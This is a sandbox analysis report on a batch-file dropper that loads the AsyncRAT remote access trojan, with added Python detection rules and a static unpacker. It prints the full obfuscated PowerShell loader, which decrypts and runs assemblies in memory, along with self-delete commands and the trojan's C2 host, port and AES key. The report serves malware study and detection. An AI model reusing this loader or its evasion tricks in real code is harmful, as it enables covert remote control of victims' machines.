File name: rain.bat
Full analysis: https://app.any.run/tasks/8ee5a115-7ade-4c8b-9c04-b357de1330a8
Verdict: Malicious activity
Threats: AsyncRAT

AsyncRAT is a remote access trojan that can monitor and remotely control infected systems. It was published on GitHub as a legitimate open-source remote administration tool, but threat actors abuse its many powerful capabilities. In this run it is the final payload, decrypted and loaded in memory by the renamed PowerShell process lveka.bat.exe (PID 2128).

Analysis date: January 19, 2024, 16:35:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: asyncrat, rat
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5: F224D4174FE90EB1F75EBD0A0B91ADFB
SHA1: 052A642D0D71D0BDB7369E2CF120D1517C905EAB
SHA256: 66F273E6E122F7CDF0536864EACFDFBAF76634557165F7773C5B38E8C68BBF4B
SSDEEP: 1536:N1kdXY62fPuoafS4Sy+D0IN4hxFmr+7bagKpUE44MDfx:Nul2fPuoafS4W0a4h2r+7vKpUE44MDfx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)
    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)
    • ASYNCRAT has been detected (MUTEX)

      • lveka.bat.exe (PID: 2128)
    • ASYNCRAT has been detected (YARA)

      • lveka.bat.exe (PID: 2128)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)
    • Application launched itself

      • cmd.exe (PID: 1776)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1776)
      • wscript.exe (PID: 1504)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 1776)
      • wscript.exe (PID: 1504)
    • The executable file from the user directory is run by the CMD process

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)
    • Reads security settings of Internet Explorer

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Checks Windows Trust Settings

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Starts itself from another location

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Starts POWERSHELL.EXE for commands execution

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • The process executes VB scripts

      • rain.bat.exe (PID: 2072)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1504)
    • Reads the Internet Settings

      • rain.bat.exe (PID: 2072)
      • wscript.exe (PID: 1504)
      • lveka.bat.exe (PID: 2128)
    • Connects to unusual port

      • lveka.bat.exe (PID: 2128)
  • INFO

    • Process checks Powershell version

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Checks supported languages

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Reads the computer name

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Reads the machine GUID from the registry

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
    • Creates files or folders in the user directory

      • rain.bat.exe (PID: 2072)
    • Create files in a temporary directory

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
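The indicators above map onto a handful of concrete process-creation checks. What follows is an added example written for this page, not ANY.RUN's detection logic: a small rule set run over constructed Sysmon-style events that mirror the process tree in this report. PIDs, image paths and command lines are taken from the report; the parent PIDs are inferred from the parent-process column, the loader's long obfuscated script is shortened to an excerpt, the field names are a simplification of Sysmon Event ID 1, and the benign PID 3000 event is invented as a control. The rules flag PowerShell running under a renamed image, a hidden-window inline script built with string splitting or base64, the GetProcessById/WaitForExit/Remove-Item self-delete helper, and cmd.exe spawned by a script host to run a .bat, and the last function reconstructs the ancestry chain that ends in the AsyncRAT process.

```python
"""Detection checks for the execution chain in this report, run over constructed
Sysmon-style process-creation events (added example, not the sandbox's own logic)."""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
WSH = r"C:\Windows\System32\WScript.exe"
APP = r"C:\Users\admin\AppData"
# Shortened excerpt of the loader's inline script (assumed abbreviation of the
# report's command line); the rule keys on its structure, not its length.
OBF = (r"-w hidden -c $zCGe='InvOMHhokOMHheOMHh'.Replace('OMHh', '');"
       r"$iNLl='FroOMHhmBOMHhaOMHhse64OMHhStrOMHhiOMHhngOMHh'.Replace('OMHh', '');"
       r"$MAYiV.Key=[System.Convert]::$iNLl('L1o/8p/B7L2d9hQ4eCLQLM4LrvLbmhevljh9BFLdQJ0=');")
# Self-delete helper exactly as spawned by PIDs 668 and 1536 (%d = PID waited on).
SELF_DELETE = (r"$a = [System.Diagnostics.Process]::GetProcessById(%d);$b = $a.MainModule.FileName;"
               r"$a.WaitForExit();Remove-Item -Force -Path $b;")


def ev(pid, ppid, image, cmdline, description):
    """One process-creation event; ppid 0 stands for explorer.exe, which is not modelled."""
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline, "description": description}


EVENTS = [  # constructed from the report's process tree
    ev(1776, 0, CMD, r'%s /c ""%s\Local\Temp\rain.bat" "' % (CMD, APP), "Windows Command Processor"),
    ev(1056, 1776, CMD, r'%s /K "%s\Local\Temp\rain.bat"' % (CMD, APP), "Windows Command Processor"),
    ev(2072, 1056, APP + r"\Local\Temp\rain.bat.exe", r'"%s\Local\Temp\rain.bat.exe" %s' % (APP, OBF), "Windows PowerShell"),
    ev(668, 2072, PS, '"%s" %s' % (PS, SELF_DELETE % 2072), "Windows PowerShell"),
    ev(1504, 2072, WSH, r'"%s" "%s\Roaming\lveka.vbs"' % (WSH, APP), "Microsoft ® Windows Based Script Host"),
    ev(1972, 1504, CMD, r'%s /c ""%s\Roaming\lveka.bat" "' % (CMD, APP), "Windows Command Processor"),
    ev(2128, 1972, APP + r"\Roaming\lveka.bat.exe", r'"%s\Roaming\lveka.bat.exe" %s' % (APP, OBF), "Windows PowerShell"),
    ev(1536, 2128, PS, '"%s" %s' % (PS, SELF_DELETE % 2128), "Windows PowerShell"),
    # Invented benign control: PowerShell from its normal path, visible window, no obfuscation.
    ev(3000, 0, PS, '"%s" -NoProfile -Command Get-Process' % PS, "Windows PowerShell"),
]


def image_name(path):
    """Basename of a Windows path (os.path.basename does not split on '\\' on Linux)."""
    return path.rsplit("\\", 1)[-1].lower()


def is_powershell(e):
    """PE metadata survives renaming: rain.bat.exe still describes itself as Windows PowerShell."""
    return e["description"] == "Windows PowerShell"


def rule_renamed_powershell(e):
    """'Process drops legitimate windows executable' / 'Starts PowerShell from an unusual
    location': powershell.exe copied under the user profile as <name>.bat.exe."""
    return is_powershell(e) and image_name(e["image"]) != "powershell.exe"


def rule_hidden_inline_script(e):
    """-w hidden -c <script> where the script builds names by string splitting or base64."""
    c = e["cmdline"]
    hidden = re.search(r"-w(indowstyle)?\s+hidden", c, re.I)
    inline = re.search(r"\s-c(ommand)?\s", c, re.I)
    obfuscated = c.count(".Replace(") >= 2 or "FromBase64String" in c
    return bool(is_powershell(e) and hidden and inline and obfuscated)


def rule_self_delete_helper(e):
    """The PID 668/1536 pattern: wait for a PID to exit, then Remove-Item its image file."""
    c = e["cmdline"]
    return is_powershell(e) and all(s in c for s in ("GetProcessById(", "WaitForExit()", "Remove-Item"))


def rule_script_host_to_cmd(e, parent):
    """'Runs shell command (SCRIPT)': wscript/cscript spawning cmd.exe to run a .bat."""
    return (parent is not None and image_name(parent["image"]) in ("wscript.exe", "cscript.exe")
            and image_name(e["image"]) == "cmd.exe" and ".bat" in e["cmdline"].lower())


def evaluate(events):
    """Return {pid: sorted rule names} for every event that trips at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        fired = [name for name, rule in (("renamed_powershell", rule_renamed_powershell),
                                         ("hidden_inline_script", rule_hidden_inline_script),
                                         ("self_delete_helper", rule_self_delete_helper)) if rule(e)]
        if rule_script_host_to_cmd(e, by_pid.get(e["ppid"])):
            fired.append("script_host_to_cmd")
        if fired:
            hits[e["pid"]] = sorted(fired)
    return hits


def ancestry(events, pid):
    """Image names from pid up to the root, e.g. the AsyncRAT host 2128 back to the first cmd.exe."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for pid, names in sorted(evaluate(EVENTS).items()):
        print(pid, ", ".join(names))
    print(" <- ".join(ancestry(EVENTS, 2128)))
```

The renamed-image check leans on the PE description rather than the file name because that is what survives the copy: the report itself shows rain.bat.exe and lveka.bat.exe reporting "Windows PowerShell" and the same version string as the real powershell.exe. In a production rule the same field is Sysmon's OriginalFileName or Description.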

AsyncRat configuration

(PID) Process: (2128) lveka.bat.exe
C2 (1): hicham157484.ddns.net
Ports (1): 1994
Botnet: Default
Version: 0.5.7B
Options
AutoRun: false
Mutex: AsyncMutex_6SI8OkPnk
InstallFolder: %AppData%
BSoD: false
AntiVM: false
Certificates
Cert1: MIIE8jCCAtqgAwIBAgIQALBkRuNCTqKtgapRE9OFfzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwOTA4MTcxOTA2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIUy6LUKGJiU+zs5YT6bYIiVfLqLpcI+LU0E4VJAwp9P6glbx/vcYicyK5/XI6drbESmiYtKXn2S... (truncated in the report; the visible prefix decodes to a self-signed certificate with issuer and subject CN "AsyncRAT Server", valid from 2021-09-08 17:19:06 to 9999-12-31 23:59:59, which is the server certificate AsyncRAT generates on first run)
Server_Signature: U6yQDpYAiQhEe46iuFVN7EpkekpvYysTH1W+eRhh37rDTf9dC/g5VgaflSqm/M8fn8iz3fp1/I/C3GKkxbkrtP3P9Y9hIxzMM6/VRA3whE5RgzRbxsSnbZ8txE89x+P9tWIY6GxuAq0IrbGsU5d7CsCSopQSKYJ6/Vs2ZfR3+gTjafyuOFySodYInhhpU73i6vEP/MQL/ufuMWPcRL2Xjg34NhFRyFzUHXHvfhKk9zrS/NYNbO/dI+MNNWsc9DMx6gOVQsTZzSU6C7vy0FagzVGAoVdG8ItDOXY2VyC9dSWE... (truncated in the report)
Keys
AES: 620f154f8f8990c1a81c72e58222885dc066d6ea66f1e4be3b2bcfa06bdec3fd
Salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Note: the salt is the constant hard-coded in AsyncRAT's source, so it is shared by every build and is not a sample-specific indicator; the mutex, C2 host, port, certificate and AES key are build-specific. The C2 host and port match the single outbound connection made by PID 2128 under Connections below.
Total processes: 45
Monitored processes: 8
Malicious processes: 6
Suspicious processes: 0

Behavior graph

Process tree reconstructed from the parent-process fields below ("no specs" in the graph means no process-specific indicator fired for that node):

explorer.exe
  cmd.exe (PID 1776): cmd /c rain.bat
    cmd.exe (PID 1056): cmd /K rain.bat, drops rain.bat.exe (a copy of powershell.exe)
      rain.bat.exe (PID 2072): hidden-window inline loader
        powershell.exe (PID 668): waits for PID 2072 to exit, then deletes rain.bat.exe
        wscript.exe (PID 1504): runs %AppData%\lveka.vbs
          cmd.exe (PID 1972): cmd /c lveka.bat, drops lveka.bat.exe
            lveka.bat.exe (PID 2128): same loader; #ASYNCRAT (C2 hicham157484.ddns.net:1994)
              powershell.exe (PID 1536): waits for PID 2128 to exit, then deletes lveka.bat.exe

Process information

PID 668
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2072);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: rain.bat.exe (PID 2072)
Note: self-delete helper. It blocks until PID 2072 (rain.bat.exe) exits and then deletes that process's image file, so the dropped PowerShell copy in %Temp% does not outlive the stage it launched.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID 1056
CMD: C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\rain.bat"
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe (PID 1776)
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID 1504
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\lveka.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: rain.bat.exe (PID 2072)
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID 1536
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2128);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: lveka.bat.exe (PID 2128)
Note: the same self-delete helper as PID 668, this time waiting for PID 2128 (lveka.bat.exe) and deleting its image from %AppData%.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID 1776
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\rain.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID 1972
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\lveka.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe (PID 1504)
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID 2072
CMD: "C:\Users\admin\AppData\Local\Temp\rain.bat.exe" -w hidden -c $zCGe='InvOMHhokOMHheOMHh'.Replace('OMHh', '');$TNot='FirOMHhsOMHhtOMHh'.Replace('OMHh', '');$LhpA='CrOMHheateOMHhDecrOMHhyOMHhptOMHhorOMHh'.Replace('OMHh', '');$Fbab='ChaOMHhngeOMHhExOMHhteOMHhnsOMHhiOMHhoOMHhnOMHh'.Replace('OMHh', '');$LqGV='GetOMHhCurrOMHhentOMHhPrOMHhocOMHhessOMHh'.Replace('OMHh', '');$ltdc='MOMHhainOMHhMOMHhoOMHhdOMHhuleOMHh'.Replace('OMHh', '');$IZgb='ReaOMHhdLiOMHhneOMHhsOMHh'.Replace('OMHh', '');$fJiW='SOMHhpOMHhlitOMHh'.Replace('OMHh', '');$CTKP='LoaOMHhdOMHh'.Replace('OMHh', '');$MfGa='EntOMHhryOMHhPoinOMHhtOMHh'.Replace('OMHh', '');$uMSP='TOMHhransOMHhfOMHhorOMHhmFOMHhinalOMHhBloOMHhckOMHh'.Replace('OMHh', '');$iNLl='FroOMHhmBOMHhaOMHhse64OMHhStrOMHhiOMHhngOMHh'.Replace('OMHh', '');function BVGBJ($brXcq){$MAYiV=[System.Security.Cryptography.Aes]::Create();$MAYiV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MAYiV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MAYiV.Key=[System.Convert]::$iNLl('L1o/8p/B7L2d9hQ4eCLQLM4LrvLbmhevljh9BFLdQJ0=');$MAYiV.IV=[System.Convert]::$iNLl('G98UJ8fNWS+zLRcyqZYK/g==');$baaQL=$MAYiV.$LhpA();$OryHd=$baaQL.$uMSP($brXcq,0,$brXcq.Length);$baaQL.Dispose();$MAYiV.Dispose();$OryHd;}function tzHUu($brXcq){$yREyw=New-Object System.IO.MemoryStream(,$brXcq);$Uhvit=New-Object System.IO.MemoryStream;$JtfEX=New-Object System.IO.Compression.GZipStream($yREyw,[IO.Compression.CompressionMode]::Decompress);$JtfEX.CopyTo($Uhvit);$JtfEX.Dispose();$yREyw.Dispose();$Uhvit.Dispose();$Uhvit.ToArray();}$nhjCT=[System.Linq.Enumerable]::$TNot([System.IO.File]::$IZgb([System.IO.Path]::$Fbab([System.Diagnostics.Process]::$LqGV().$ltdc.FileName, $null)));$Wmvpd=$nhjCT.Substring(3).$fJiW(':');$vHgoc=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[0])));$EQpKu=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[1])));[System.Reflection.Assembly]::$CTKP([byte[]]$EQpKu).$MfGa.$zCGe($null,$null);[System.Reflection.Assembly]::$CTKP([byte[]]$vHgoc).$MfGa.$zCGe($null,$null);
Path: C:\Users\admin\AppData\Local\Temp\rain.bat.exe
Parent process: cmd.exe (PID 1056)
Note: rain.bat.exe is powershell.exe copied next to the batch file under a double extension (PE description "Windows PowerShell", same hash as lveka.bat.exe under Dropped files). The inline script hides every sensitive .NET member name by splicing the junk token 'OMHh' into it and stripping it with .Replace() at run time; with the token removed the calls are Invoke, First, CreateDecryptor, ChangeExtension, GetCurrentProcess, MainModule, ReadLines, Split, Load, EntryPoint, TransformFinalBlock and FromBase64String. It then opens its own image path with the ".exe" extension removed (rain.bat.exe -> rain.bat, which is why the batch file has "very long lines"), takes the first line, skips three characters, splits on ':', base64-decodes the two parts, decrypts each with AES-256-CBC/PKCS7 under the hard-coded key and IV, GZip-inflates the result and loads it as a .NET assembly with Assembly.Load, invoking its entry point; the second part is run before the first. Nothing decrypted touches disk.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\local\temp\rain.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID 2128
CMD: "C:\Users\admin\AppData\Roaming\lveka.bat.exe" -w hidden -c followed by the same inline script as PID 2072, byte for byte (lveka.bat is an unchanged copy of rain.bat and lveka.bat.exe an unchanged copy of rain.bat.exe; see the hashes under Dropped files)
Path: C:\Users\admin\AppData\Roaming\lveka.bat.exe
Parent process: cmd.exe (PID 1972)
Note: this is the process in which the AsyncRAT mutex and YARA detections fired and that connects to hicham157484.ddns.net:1994, so the assembly it decrypts and loads is the AsyncRAT client whose configuration is listed above.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\roaming\lveka.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
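The inline script in the two .bat.exe processes is the whole first stage, so it is worth being able to unpack it without running it. The following is an added example written for this page, not code from the report or from the sample's author: it strips the string-splitting layer (for any junk token, not just 'OMHh'), inlines the recovered .NET member names so the loader reads as plain PowerShell, extracts the AES key and IV, and parses the carrier layout the loader expects (first line of rain.bat, three characters skipped, ':'-separated base64 parts) together with the GZip step that follows decryption. The AES-256-CBC/PKCS7 decryption between those two steps is left to whatever crypto library the analyst has, because the ciphertext parts are not in the report; the carrier line and the compressed blob below are therefore constructed stand-ins, and the three leading characters the loader skips are a placeholder.

```python
"""Static unpacking aid for the PowerShell loader run as rain.bat.exe / lveka.bat.exe.
Added example for this page, not code from the report or the sample: it resolves the
string-splitting layer, recovers the AES key/IV and parses the carrier layout, all
without executing the script."""
import base64
import gzip
import re
from collections import Counter

# Loader body as captured in the report (PID 2072 command line, after "-w hidden -c").
LOADER = (
    r"$zCGe='InvOMHhokOMHheOMHh'.Replace('OMHh', '');$TNot='FirOMHhsOMHhtOMHh'.Replace('OMHh', '');"
    r"$LhpA='CrOMHheateOMHhDecrOMHhyOMHhptOMHhorOMHh'.Replace('OMHh', '');"
    r"$Fbab='ChaOMHhngeOMHhExOMHhteOMHhnsOMHhiOMHhoOMHhnOMHh'.Replace('OMHh', '');"
    r"$LqGV='GetOMHhCurrOMHhentOMHhPrOMHhocOMHhessOMHh'.Replace('OMHh', '');"
    r"$ltdc='MOMHhainOMHhMOMHhoOMHhdOMHhuleOMHh'.Replace('OMHh', '');$IZgb='ReaOMHhdLiOMHhneOMHhsOMHh'.Replace('OMHh', '');"
    r"$fJiW='SOMHhpOMHhlitOMHh'.Replace('OMHh', '');$CTKP='LoaOMHhdOMHh'.Replace('OMHh', '');"
    r"$MfGa='EntOMHhryOMHhPoinOMHhtOMHh'.Replace('OMHh', '');"
    r"$uMSP='TOMHhransOMHhfOMHhorOMHhmFOMHhinalOMHhBloOMHhckOMHh'.Replace('OMHh', '');"
    r"$iNLl='FroOMHhmBOMHhaOMHhse64OMHhStrOMHhiOMHhngOMHh'.Replace('OMHh', '');"
    r"function BVGBJ($brXcq){$MAYiV=[System.Security.Cryptography.Aes]::Create();"
    r"$MAYiV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MAYiV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;"
    r"$MAYiV.Key=[System.Convert]::$iNLl('L1o/8p/B7L2d9hQ4eCLQLM4LrvLbmhevljh9BFLdQJ0=');"
    r"$MAYiV.IV=[System.Convert]::$iNLl('G98UJ8fNWS+zLRcyqZYK/g==');$baaQL=$MAYiV.$LhpA();"
    r"$OryHd=$baaQL.$uMSP($brXcq,0,$brXcq.Length);$baaQL.Dispose();$MAYiV.Dispose();$OryHd;}"
    r"function tzHUu($brXcq){$yREyw=New-Object System.IO.MemoryStream(,$brXcq);$Uhvit=New-Object System.IO.MemoryStream;"
    r"$JtfEX=New-Object System.IO.Compression.GZipStream($yREyw,[IO.Compression.CompressionMode]::Decompress);"
    r"$JtfEX.CopyTo($Uhvit);$JtfEX.Dispose();$yREyw.Dispose();$Uhvit.Dispose();$Uhvit.ToArray();}"
    r"$nhjCT=[System.Linq.Enumerable]::$TNot([System.IO.File]::$IZgb([System.IO.Path]::$Fbab("
    r"[System.Diagnostics.Process]::$LqGV().$ltdc.FileName, $null)));$Wmvpd=$nhjCT.Substring(3).$fJiW(':');"
    r"$vHgoc=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[0])));$EQpKu=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[1])));"
    r"[System.Reflection.Assembly]::$CTKP([byte[]]$EQpKu).$MfGa.$zCGe($null,$null);"
    r"[System.Reflection.Assembly]::$CTKP([byte[]]$vHgoc).$MfGa.$zCGe($null,$null);"
)


def junk_token(script):
    """The most common first argument of .Replace('<junk>', '') is the junk string
    spliced into every sensitive member name ('OMHh' in this sample)."""
    tokens = re.findall(r"\.Replace\('([^']+)', ''\)", script)
    if not tokens:
        raise ValueError("no .Replace('<junk>', '') pattern found")
    return Counter(tokens).most_common(1)[0][0]


def assignment_re(junk):
    """Regex for one name-building statement: $var='spl<junk>it'.Replace('<junk>', '');"""
    return r"\$(\w+)='([^']*)'\.Replace\('" + re.escape(junk) + r"', ''\);"


def resolve_names(script):
    """Map each $variable that holds a split member name to the real name."""
    junk = junk_token(script)
    return {var: raw.replace(junk, "") for var, raw in re.findall(assignment_re(junk), script)}


def deobfuscate(script):
    """Drop the name-building prologue and inline the resolved names so the loader
    reads as plain PowerShell (CreateDecryptor, Assembly.Load, EntryPoint.Invoke)."""
    clean = re.sub(assignment_re(junk_token(script)), "", script)
    for var, name in resolve_names(script).items():
        clean = re.sub(r"\$" + re.escape(var) + r"\b", name, clean)
    return clean


def aes_material(clean):
    """Base64 key and IV from the deobfuscated decrypt routine (32-byte key => AES-256)."""
    key = re.search(r"\.Key=\[System\.Convert\]::FromBase64String\('([^']+)'\)", clean)
    iv = re.search(r"\.IV=\[System\.Convert\]::FromBase64String\('([^']+)'\)", clean)
    return base64.b64decode(key.group(1)), base64.b64decode(iv.group(1))


def parse_carrier(first_line):
    """The loader opens its own image path with ".exe" removed (rain.bat.exe -> rain.bat),
    takes the first line, skips 3 characters, splits on ':' and base64-decodes each part.
    Each part is AES-CBC/PKCS7 ciphertext, so it must be a non-zero multiple of 16 bytes."""
    blobs = [base64.b64decode(p) for p in first_line.rstrip("\r\n")[3:].split(":")]
    if any(not b or len(b) % 16 for b in blobs):
        raise ValueError("part is not a whole number of AES blocks")
    return blobs


def inflate(plaintext):
    """After AES decryption each part is GZip-inflated into a .NET assembly that is
    loaded with Assembly.Load and run via EntryPoint.Invoke; part [1] runs before [0]."""
    return gzip.decompress(plaintext)


# Constructed stand-ins: the real first line of rain.bat and the decrypted assemblies are
# not in the report, and the three leading characters the loader skips are unknown ('???').
SAMPLE_CARRIER = "???" + base64.b64encode(b"\x00" * 32).decode() + ":" + base64.b64encode(b"\x01" * 48).decode()
SAMPLE_INFLATED = b"MZ\x90\x00 stand-in for a decrypted .NET assembly"
SAMPLE_DEFLATED = gzip.compress(SAMPLE_INFLATED)

if __name__ == "__main__":
    clean = deobfuscate(LOADER)
    key, iv = aes_material(clean)
    print("junk token:", junk_token(LOADER), "| names:", resolve_names(LOADER))
    print("AES-%d-CBC key=%s iv=%s" % (len(key) * 8, key.hex(), iv.hex()))
    print(clean)
```

With the real rain.bat in hand, feed its first line to parse_carrier to get the two ciphertexts, decrypt each with the recovered key and IV, and pass the plaintexts to inflate; each result should be a PE (starting "MZ") that can go straight into a .NET decompiler. Keep the load order in mind when naming them: the loader invokes part [1] first.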
Total events: 4 327
Read events: 4 289
Write events: 38
Delete events: 0

Modification events

(PID 2072) rain.bat.exe, key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:
  write ProxyBypass = 1
  write IntranetName = 1
  write UNCAsIntranet = 1
  write AutoDetect = 0
(PID 1504) wscript.exe, key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:
  write ProxyBypass = 1
  write IntranetName = 1
  write UNCAsIntranet = 1
  write AutoDetect = 0
(PID 2128) lveka.bat.exe, key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:
  write ProxyBypass = 1
  write IntranetName = 1
Executable files: 2
Suspicious files: 9
Text files: 2
Unknown types: 1

Dropped files

PID 2072 rain.bat.exe -> C:\Users\admin\AppData\Roaming\lveka.vbs (text)
MD5: 7FECB1428BF632FCF72CFD7ABFB85E61
SHA256: 016CDA08111F285D40A0C198453851BCB9BF8D0181D20C8497B8F64E5363FA98
PID 2128 lveka.bat.exe -> C:\Users\admin\AppData\Local\Temp\m4gtip0i.w35.ps1 (binary)
